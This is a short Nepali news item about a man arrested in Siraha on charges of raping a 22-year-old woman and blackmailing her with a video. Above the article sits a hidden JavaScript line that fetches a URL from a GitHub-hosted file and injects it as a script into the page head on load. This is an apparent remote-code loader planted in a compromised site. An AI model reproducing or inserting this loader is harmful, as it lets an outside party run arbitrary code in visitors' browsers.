;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०४,
काठमाडौं । २२ वर्षीया महिलालाई जबरजस्ती करणी गरी अश्लिल भिडियो बनाई व्ल्याकमेलिङ गरेको अभियोगमा एक जना पक्राउ परेका छन् । पक्राउ पर्नेमा सिराहा, कल्याणपुर नगरपालिका-४ बस्ने २० वर्षीय अजय महरा रहेको प्रहरीले जनाएको छ ।
घटनाका बारे थप अनुसन्धान जारी गरेको प्रहरीले जनाएको छ ।
फेसबुक प्रतिक्रियाहरु